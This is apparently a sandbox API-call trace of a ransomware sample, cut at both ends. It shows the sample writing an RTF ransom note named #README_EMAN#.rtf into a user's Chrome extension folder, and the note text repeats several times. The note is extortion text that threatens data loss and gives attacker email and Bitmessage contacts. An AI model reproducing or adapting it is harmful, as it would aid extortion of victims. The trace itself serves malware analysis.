ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.333] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.333] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.334] CloseHandle (hObject=0x294) returned 1 [0285.334] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\#readme_eman#.rtf")) returned 0xffffffff [0285.334] GetLastError () returned 0x2 [0285.334] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.335] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 